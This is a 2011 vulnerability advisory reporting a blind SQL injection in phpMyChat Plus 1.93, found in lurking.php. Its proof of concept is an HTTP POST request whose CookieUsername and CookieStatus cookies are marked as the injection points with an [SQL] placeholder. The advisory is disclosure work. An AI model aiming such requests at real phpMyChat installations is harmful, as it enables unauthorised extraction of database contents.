phpMyChat Plus 1.93 SQL Injection

2011-04-25T00:00:00
ID PACKETSTORM:100821
Type packetstorm
Reporter AutoSec Tools
Modified 2011-04-25T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................phpMyChat Plus 1.93  
Vulnerability...........Blind SQL Injection  
Threat Level............Serious (3/5)  
Download................http://sourceforge.net/projects/phpmychat/  
Discovery Date..........4/25/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A SQL injection vulnerability in phpMyChat Plus 1.93 can be exploited  
to extract arbitrary data.  
  
  
--PoC--  
  
POST /plus/lurking.php HTTP/1.1  
Host: localhost  
Proxy-Connection: keep-alive  
User-Agent: x  
Content-Length: 0  
Cache-Control: max-age=0  
Origin: null  
Content-Type: multipart/form-data; boundary=----x  
Cookie: CookieUsername=[SQL]; CookieStatus=[SQL]; CookieRoom=x; CookieLang=x; CookieUserSort=x  
Accept: text/html  
Accept-Language: en-US,en;q=0.8  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3  
`